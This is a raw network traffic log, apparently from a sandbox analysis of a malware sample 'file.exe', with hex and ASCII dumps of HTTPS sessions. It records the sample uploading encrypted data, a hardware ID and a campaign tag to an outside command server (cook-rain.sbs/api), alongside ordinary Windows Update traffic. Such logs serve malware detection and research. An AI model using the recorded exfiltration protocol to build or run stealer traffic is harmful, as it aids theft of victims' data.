                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1BuENB9O55QQk5dzv3mzn65OE9b3an%2BJtdGJrChy8oNmGuoBil1DRg0LN5IQhh4wW67HYp2qUFvY6XHWPJWN1jXDTgh8zdYhqvHt2xTaXxIlLL8KGaWOJMu0HoKdbM1C"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e65d106eae94406-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1738&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=2086&delivery_rate=1655328&cwnd=186&unsent_bytes=0&cid=4c09fe5822f156f7&ts=748&x=0"
                                                                                                                                                                                                            2024-11-22 03:26:11 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                            2024-11-22 03:26:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.449737172.67.155.2484436568C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:14 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=GXOYEINOYT
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 585198
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-22 03:26:14 UTC15331OUTData Raw: 2d 2d 47 58 4f 59 45 49 4e 4f 59 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 42 45 34 39 30 41 44 41 37 38 35 46 41 45 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 47 58 4f 59 45 49 4e 4f 59 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 58 4f 59 45 49 4e 4f 59 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 47 58 4f 59 45 49 4e 4f 59 54 0d 0a 43 6f
                                                                                                                                                                                                            Data Ascii: --GXOYEINOYTContent-Disposition: form-data; name="hwid"FBE490ADA785FAE6D7CBBD6DF28D3732--GXOYEINOYTContent-Disposition: form-data; name="pid"1--GXOYEINOYTContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--GXOYEINOYTCo
                                                                                                                                                                                                            2024-11-22 03:26:14 UTC15331OUTData Raw: 6a 51 8c 0b 1b d2 2f 26 1d bf b6 6a d6 bb ab 73 d8 16 19 15 55 c9 db 26 b3 dc 9c 26 ba f5 8a 9a 54 e2 a0 bd 4f e8 62 96 2a 36 a2 22 fe 38 13 78 1f 84 ca 2e d5 cc 94 5e e3 c7 0d 0c 6e e5 15 12 1f c3 5e ea 84 81 12 a5 4a 04 fd 79 7a a3 a1 36 66 e8 c8 d9 49 ed f0 bf 3e ee 13 b5 c1 dc 6e e9 27 38 f3 3f 2f 3c 38 b5 66 3e 23 d3 55 f5 20 5b 1d cd 9e 56 37 65 bf 7f 9f 0a d1 77 98 0a d9 d0 57 cd 3b d8 54 3d 51 0d 4a 92 f6 84 14 de 9d 69 e9 e2 3c 93 5f 81 1b e4 ef 81 b6 a0 ea e8 de 84 d3 9c 1d b3 85 26 61 ee 87 52 f6 e2 a6 19 43 2e 6e 3e ca 5d ab bc 21 bc 0d e7 f3 d7 d7 6b 0e 52 cf b3 d3 e7 7d 62 84 01 d0 8b a0 5a a3 52 68 96 45 62 f4 9f e2 dd ab 27 fd 96 bf 84 e7 80 1e 61 df db ba 4f 40 4f 35 60 07 ef 5e 4f 3e f8 c9 75 35 a5 2c b0 d3 4d 85 ef 3e 1b 75 9a 6d 36 b7
                                                                                                                                                                                                            Data Ascii: jQ/&jsU&&TOb*6"8x.^n^Jyz6fI>n'8?/<8f>#U [V7ewW;T=QJi<_&aRC.n>]!kR}bZRhEb'aO@O5`^O>u5,M>um6
                                                                                                                                                                                                            2024-11-22 03:26:14 UTC15331OUTData Raw: 44 c2 46 2a 08 b7 81 fc ff ed 3d 24 e1 c7 30 76 41 bd a6 25 b9 37 5e 51 6c 14 d8 93 9a 5e 36 42 c1 f3 a3 71 1c a0 f8 a9 18 ec cf 9b 29 ed be f1 e4 30 41 25 20 bd 8b 29 37 9b ad 63 e9 5c 67 6d 84 12 f5 b2 78 1e cd c1 20 d8 4d 59 1b ca 7b a1 10 4d 1f da 02 8b 1e 87 cc 2e 36 48 0a ea ba 9d 7f af 74 c1 6f 5f a4 90 da eb 54 1a e1 3b 2d 33 03 4e e0 f3 85 a0 93 17 55 7f df 61 2b 09 22 99 84 41 74 93 dd e5 3c ce 15 31 6c 66 2b cc 2f f6 7a 3d 09 e0 9b b4 be b3 d9 fd 55 40 b9 a6 12 ab b9 e6 d5 f5 34 d4 ce 65 63 e0 31 ac cc e9 36 83 6e 9d 46 cc ef e5 71 1a 6d 85 a8 fb 30 27 25 cf 93 3a 18 91 5e bc 31 84 e7 11 df 78 44 5d 21 de 87 0e 95 e2 ec f3 0c e0 f8 bd f9 87 40 f9 bf c8 c0 d8 9c 2f 8e da fb a2 eb 87 b7 4b 6f 4a 47 85 fb 4e 5d 03 66 22 32 cb 8d 05 39 17 73 5d ec
                                                                                                                                                                                                            Data Ascii: DF*=$0vA%7^Ql^6Bq)0A% )7c\gmx MY{M.6Hto_T;-3NUa+"At<1lf+/z=U@4ec16nFqm0'%:^1xD]!@/KoJGN]f"29s]
                                                                                                                                                                                                            2024-11-22 03:26:14 UTC15331OUTData Raw: 0a df 0b 8e 1b 20 ce 18 17 f1 45 07 dd c3 30 56 47 9a ef 6f 98 24 1a 83 95 94 8b ac 3f 7a 06 fd c7 52 87 66 9e 87 af 40 39 c8 e0 8b 0e c4 ae c4 ed ea 23 77 5f 35 df b2 36 7e c4 b0 e9 08 f2 00 82 90 73 cf 39 bb 02 c5 df 9d 55 4b 83 b5 2a 05 9c d3 03 42 64 5f ce 51 f6 18 0a 84 67 b7 d4 4a 64 5c fe 2f 7e 7f dc b9 e1 23 7d e1 cb 27 ef 0b 16 9d 03 5b 6c e6 05 cf d7 dc 1d 08 a0 04 78 6d 55 ee c1 56 77 5f b0 3f 1f 55 2d aa 5d 2a 00 0e 25 10 d9 90 eb bc b4 89 db 42 a9 fc 36 91 52 59 90 c7 22 fa d5 dd 89 8a 17 4e a9 f0 bd bd 09 3c e7 cb 4c 88 a6 80 b4 65 18 d9 cf 0d 6f a6 d0 37 22 ef 70 4e 42 bc 09 f0 c8 a5 0c 80 fc 4e 10 bf 9b f9 72 79 f4 3c 41 f4 39 c3 40 4f 5d f2 3e a4 b6 8e 00 9a 01 1e 50 88 8b 65 b5 0d b0 9a bc e0 53 10 21 f7 69 51 09 4f 7a 4a e1 e9 3a fa 4f
                                                                                                                                                                                                            Data Ascii: E0VGo$?zRf@9#w_56~s9UK*Bd_QgJd\/~#}'[lxmUVw_?U-]*%B6RY"N<Leo7"pNBNry<A9@O]>PeS!iQOzJ:O
                                                                                                                                                                                                            2024-11-22 03:26:14 UTC15331OUTData Raw: e2 ca 93 f6 d6 ba 0e f3 13 4e 5d f5 87 d1 50 9c 93 c8 6b 6f 9e 50 78 ad 69 8d 47 a9 29 45 45 b2 07 84 eb f9 72 45 70 8a 7e 4a 07 b9 b9 d1 21 8e d0 2b d9 75 d2 ca e7 a5 35 1a 56 2c a9 39 d7 54 e4 b7 9b c4 18 34 d4 55 75 2b a1 be 33 f2 9e 98 c5 5e 11 97 09 3e 54 6b 25 09 4e dc 68 bc b4 e3 2d 30 e7 b8 37 9a ed 08 7d ed 87 cf f7 d7 cf 6c 8e fc e8 d3 93 62 cb 6b 34 d2 66 5a f6 6b 8f 46 c4 c6 a4 31 78 42 a1 78 79 d7 2f f7 2b 57 cb 54 00 cd 55 65 70 7a 09 32 ab 0e b7 cb 51 51 c5 cf 87 b6 af ac f9 8d b6 6d 58 56 b4 ac bd de 74 8b 8b ac 5b 57 3b c8 93 a8 a2 32 d0 b8 11 ef 71 48 24 cd 90 8b da 06 ec 4d f3 34 43 7f 8e 8e 72 db 80 16 04 ff 7d 4f c5 61 92 69 05 27 e4 47 b4 68 f3 dd c1 55 ef 74 92 43 5e 2d 57 86 d3 3a c5 93 78 18 10 2f 10 5b 1c 44 11 da 42 73 d6 20 be
                                                                                                                                                                                                            Data Ascii: N]PkoPxiG)EErEp~J!+u5V,9T4Uu+3^>Tk%Nh-07}lbk4fZkF1xBxy/+WTUepz2QQmXVt[W;2qH$M4Cr}Oai'GhUtC^-W:x/[DBs
                                                                                                                                                                                                            2024-11-22 03:26:14 UTC15331OUTData Raw: 6e bb 8f eb 06 b0 bc 52 b1 36 f0 64 db 2a 3c 88 38 cc b4 e8 56 79 9d 96 23 b1 29 26 3d 1d 52 b2 85 dd da 9b 32 62 b1 37 f3 06 be ac c1 44 66 02 9a 1f be c7 08 5c 74 95 0f d5 77 6e ad 31 f6 c4 88 9c a9 42 e0 bc 54 72 cc a2 78 6b c8 e3 d4 b1 d9 e4 6a 87 03 5e 13 7d 6a 85 e9 05 a2 33 64 a4 f9 24 df f7 22 5f c1 be 18 2f 75 9d ec 5d ca ea 18 55 c0 0b 89 8a 32 d7 e6 53 0b b1 fd fe 99 2e 36 93 02 87 75 9a bd 7d b7 f6 09 25 27 ec cd d3 e1 f2 e9 25 42 46 9e a0 f8 d0 c8 0e 90 b9 70 8e d9 c0 38 74 d9 23 d6 14 cb 9a fa 58 f0 a9 b2 0b 72 4b 09 13 40 8e b0 23 7e c5 3f 21 d2 08 d8 c5 5c 9e a9 81 69 a0 46 25 6c 72 7a 26 a7 19 07 f6 ab b5 db c3 8f c1 8c 62 f5 7f 8c 92 d6 e0 c9 d6 2b 3c 81 7b 01 0b aa f2 bd 48 a4 f9 91 53 95 33 d5 c3 07 5e e9 ee fa ea dc 3b dd 9a 56 72 e7
                                                                                                                                                                                                            Data Ascii: nR6d*<8Vy#)&=R2b7Df\twn1BTrxkj^}j3d$"_/u]U2S.6u}%'%BFp8t#XrK@#~?!\iF%lrz&b+<{HS3^;Vr
                                                                                                                                                                                                            2024-11-22 03:26:14 UTC15331OUTData Raw: 3e 5d fe 37 db 21 7f 47 e9 4a 8b e1 b3 fe bb 55 c6 a5 73 5d fd 7f 5f b9 5b fa ad f6 9f 57 77 ca f6 95 2e 4d ea ee 26 70 7b 5b ff ae e2 fe 19 de 43 d8 58 4a 6b c5 2e be 52 06 3d 69 02 83 14 18 16 11 30 a9 da bc 2e 0a d2 18 60 b1 6e fc f7 21 90 8d 82 99 da 99 5a 38 0b 40 c8 86 50 08 84 38 58 17 87 72 5e 0f a8 fd 3a 8d e4 85 52 70 72 cb ec 83 3d 06 08 5e b8 28 7e 78 3f 21 6b f3 62 7f fa 47 8d ef 3b 45 4c d1 e1 30 fc ac e9 f2 72 77 77 e5 9f 85 ab a2 a9 61 6c c3 1c b3 0f 31 2c 6f ef 0d f7 17 8f 20 52 86 17 fd 10 98 b5 f6 16 06 22 82 d8 16 c9 ed e6 88 bc e5 f5 92 47 cd b7 2f 8b 6a e2 79 29 b6 ff e8 d2 c3 0b 9e f8 b6 7f e0 55 79 a8 4b 0e 96 87 ee 94 82 20 0c 7c 08 83 7f b7 0b 2f 80 f8 33 95 9e 2d 68 33 56 e5 c7 47 3f fe 76 3c 5d 00 5c fa c1 8e fd 01 0a 5b 88 35
                                                                                                                                                                                                            Data Ascii: >]7!GJUs]_[Ww.M&p{[CXJk.R=i0.`n!Z8@P8Xr^:Rpr=^(~x?!kbG;EL0rwwal1,o R"G/jy)UyK |/3-h3VG?v<]\[5
                                                                                                                                                                                                            2024-11-22 03:26:14 UTC15331OUTData Raw: ec 2b 51 39 89 7c b4 b0 16 92 71 b4 ca 9f 9d 0c e2 86 18 61 46 ac 82 f8 cd 49 7e 30 c2 b7 4a ba 33 71 74 a3 2f 23 e7 3f d7 f2 bb 8c e0 62 d6 cd bb 06 73 11 f3 4a 77 b8 39 82 83 05 5f 76 a7 fd 30 b9 6f b7 e1 bd 58 da 96 a6 94 d2 1a 5a 53 e1 72 e9 d2 e6 26 9b c5 b9 1f 6f c6 d1 67 1c 9d 5b b6 08 9c 90 82 7b 2d 24 ba 01 35 46 e2 7f c1 63 36 b8 9c f9 98 c0 b2 1c 39 12 c9 99 2d 9f 70 75 19 9c 29 5f ee 5e e1 20 15 15 43 ca d8 2c 94 16 96 36 99 f2 d4 bf 64 41 09 b7 a6 29 10 83 b1 e4 23 f1 59 96 36 11 24 09 59 bf 08 e7 06 90 7a 15 5b 3b 2c 2a dc 7f 2f 28 b4 56 52 8e 10 12 8b be 31 e2 08 32 9a 1b 9c 73 c0 66 68 04 da 75 ad 16 e6 7d c9 b8 84 c5 c7 bf 7f 2c 08 0f 0b 42 7f d2 e8 ee c1 9f 85 18 ab fe 33 5b 13 fe a7 aa f8 82 cf f4 04 34 dd fa 96 36 f2 df 97 89 0d cd d6
                                                                                                                                                                                                            Data Ascii: +Q9|qaFI~0J3qt/#?bsJw9_v0oXZSr&og[{-$5Fc69-pu)_^ C,6dA)#Y6$Yz[;,*/(VR12sfhu},B3[46
                                                                                                                                                                                                            2024-11-22 03:26:14 UTC15331OUTData Raw: 90 dc 48 b0 ca c9 df 33 c7 a5 a9 1f 13 75 46 57 2f ba 25 06 61 ba 82 be d6 30 c1 ca ee 19 9b 7a fb b6 75 c7 53 bf fe d4 d5 fe bd 2d c8 2e 7f 81 47 14 1d 79 33 21 e4 dd 08 ca eb d2 e8 a4 e5 1b 61 70 12 da ab 35 6d f4 59 75 8a 50 c0 c2 b7 0c ca cc c2 2e 4c 8d 13 f9 26 6a 17 ea db 2a 4d 8e b0 ec 4f bd 06 bc 7e 24 ec 8f e0 e7 18 a0 9b 0b 2d a3 18 9c b2 3c b4 0b 5f 7e 82 9a c7 c6 40 3e 95 c8 26 45 57 dd 45 db d1 b3 8d 00 0e 2b b5 8d 14 db 9d b2 8b a7 da 2a 38 5a 82 35 c0 42 bf d6 5f bc 72 d9 4f 3b ba ee f6 10 19 96 6f 80 30 78 bc 90 e2 e5 b7 2a ca f7 1a ec 75 67 76 ad bd 50 15 7a 6c ac 73 3f 2a fd 02 eb 08 52 75 56 03 9f ba 6e 9b b7 f1 cc 0f 6f d3 cd 8f 53 3d 9f c7 52 3c fc de 15 d0 32 70 06 8b e3 23 1b 27 f8 ad 3f 86 d1 ba 24 4c be 7f 13 6b 65 77 46 13 ca f8
                                                                                                                                                                                                            Data Ascii: H3uFW/%a0zuS-.Gy3!ap5mYuP.L&j*MO~$-<_~@>&EWE+*8Z5B_rO;o0x*ugvPzls?*RuVnoS=R<2p#'?$LkewF
                                                                                                                                                                                                            2024-11-22 03:26:14 UTC15331OUTData Raw: 2b 5f 95 ef 10 d3 ca 3e 3b 68 e5 3c ae 77 3a 45 1d aa fa 46 2e 81 2c 2b 65 30 b3 75 c6 d0 46 f5 14 19 99 e6 d0 46 45 8d f2 5c 33 61 4e ab 9b 76 fe d9 6f 7d 49 a8 36 89 e2 34 19 41 29 c3 bc 12 71 c8 bb 4c ae 0d 93 85 b6 c8 7c aa 14 02 22 76 45 81 84 a3 2c ce ba ff 18 91 dd 17 d3 1e 5a 8a 6b ae 0b c8 7f c5 40 e7 ec 52 2c ff 77 9c 94 fd 51 69 ed 9b 1c ed db f2 e9 01 b6 88 72 04 83 3c ff eb 22 ae 30 d9 8a 59 e3 dd 8f 52 dd d3 1f 52 24 dd a7 3b b5 cc 72 a8 cb 8a b4 af 7d a7 52 4e 60 fd c8 4c 29 2d 3a 4f 6c fa 56 de ad 1c 56 e8 a7 2d d9 ff 4e 98 39 31 bf 1d 90 9c 62 43 71 5f 2d 4e 85 0f fc eb 65 b0 67 f9 43 dd ec 8b d9 c8 f7 d2 8d 5e e1 2f 17 ab f5 66 dc 95 67 2d ff 41 9f fd 07 ed 1a 21 35 5b 2d da b1 f6 8d d5 37 53 9a f6 b1 2f e0 89 74 61 de 74 cc b1 5b 27 5d
                                                                                                                                                                                                            Data Ascii: +_>;h<w:EF.,+e0uFFE\3aNvo}I64A)qL|"vE,Zk@R,wQir<"0YRR$;r}RN`L)-:OlVV-N91bCq_-NegC^/fg-A!5[-7S/tat[']
                                                                                                                                                                                                            2024-11-22 03:26:19 UTC1019INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:19 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=a9tv7hsulmg88kck73rvjfe6kp; expires=Mon, 17-Mar-2025 21:12:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T1HcKJiHenGDSfbB1%2F8ItgrUfvVcc4YU2eAp12jabbL%2Br%2BekkjkSOhZJsdEn%2BKvNTnT5HVXy0%2F8ZmwSBtN0ykqHeEXtc2dQED%2BRY3ibdsxlzasR%2Fu6BndiLKBBmrYOFk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e65d11bcda01a24-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1935&sent=331&recv=604&lost=0&retrans=0&sent_bytes=2830&recv_bytes=587778&delivery_rate=1471032&cwnd=209&unsent_bytes=0&cid=26e523f17497a15b&ts=4981&x=0"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.44973620.109.210.53443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:16 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pDmcNf2Vnao8OO7&MD=UZBBkmrN HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                            2024-11-22 03:26:16 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                            ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                            MS-CorrelationId: ccd3bd00-31bd-4b32-85fa-6700c314f4d3
                                                                                                                                                                                                            MS-RequestId: 9ae0757f-6288-4939-9869-c8c0e80f6746
                                                                                                                                                                                                            MS-CV: HciXTbX7ck+JrDLF.0
                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:16 GMT
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Content-Length: 24490
                                                                                                                                                                                                            2024-11-22 03:26:16 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                            Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                            2024-11-22 03:26:16 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                            Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.449742172.67.155.2484436568C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:20 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 88
                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                            2024-11-22 03:26:20 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 46 42 45 34 39 30 41 44 41 37 38 35 46 41 45 36 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32
                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=FBE490ADA785FAE6D7CBBD6DF28D3732
                                                                                                                                                                                                            2024-11-22 03:26:21 UTC1001INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:21 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=3sitjpr70kq855p5s7n9jvjqkm; expires=Mon, 17-Mar-2025 21:12:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6SOb862lz3R07TlwqLmdSCBmq7EHuBtwHF2GkHtJtR%2BV8Pvt5sozbnTZON9ZwPb6iPcTJ0m6ThUT2IyxbanAK7nTViSXEP%2BUcto5udBVsAgbOi3PGKsdF9BtPxG6wtsg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e65d143fa0d7c84-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1904&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=985&delivery_rate=1489795&cwnd=245&unsent_bytes=0&cid=45516e2735b22a79&ts=738&x=0"
                                                                                                                                                                                                            2024-11-22 03:26:21 UTC214INData Raw: 64 30 0d 0a 35 33 4f 49 33 6d 58 78 4f 34 55 6c 46 59 4c 66 71 59 70 65 54 49 35 4b 33 31 45 55 69 44 6e 4e 44 50 38 68 54 69 76 35 33 70 71 38 43 4b 71 72 52 38 73 5a 37 56 46 68 38 75 58 31 70 51 4a 6a 76 33 4c 71 66 79 61 35 44 4f 4d 39 7a 68 4a 67 47 73 2b 43 74 59 67 56 37 6f 4a 4b 6c 56 37 6a 43 33 44 36 75 6f 75 6d 66 43 72 36 61 4f 56 68 4f 4b 70 63 37 7a 62 4f 58 47 4a 51 32 36 75 34 33 56 48 67 71 68 47 42 41 64 6b 4b 53 61 33 75 6b 62 39 77 66 72 39 2f 38 57 41 6c 75 78 66 38 4f 71 4d 4f 50 56 2b 63 76 2f 65 37 58 50 71 2f 43 35 56 55 36 41 74 77 2b 72 71 4c 70 6e 77 71 2b 6d 6a 6c 59 54 69 71 58 4f 38 32 7a 31 77 54 0d 0a
                                                                                                                                                                                                            Data Ascii: d053OI3mXxO4UlFYLfqYpeTI5K31EUiDnNDP8hTiv53pq8CKqrR8sZ7VFh8uX1pQJjv3Lqfya5DOM9zhJgGs+CtYgV7oJKlV7jC3D6uoumfCr6aOVhOKpc7zbOXGJQ26u43VHgqhGBAdkKSa3ukb9wfr9/8WAluxf8OqMOPV+cv/e7XPq/C5VU6Atw+rqLpnwq+mjlYTiqXO82z1wT
                                                                                                                                                                                                            2024-11-22 03:26:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            9192.168.2.449762184.30.17.174443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:39 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                            2024-11-22 03:26:39 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
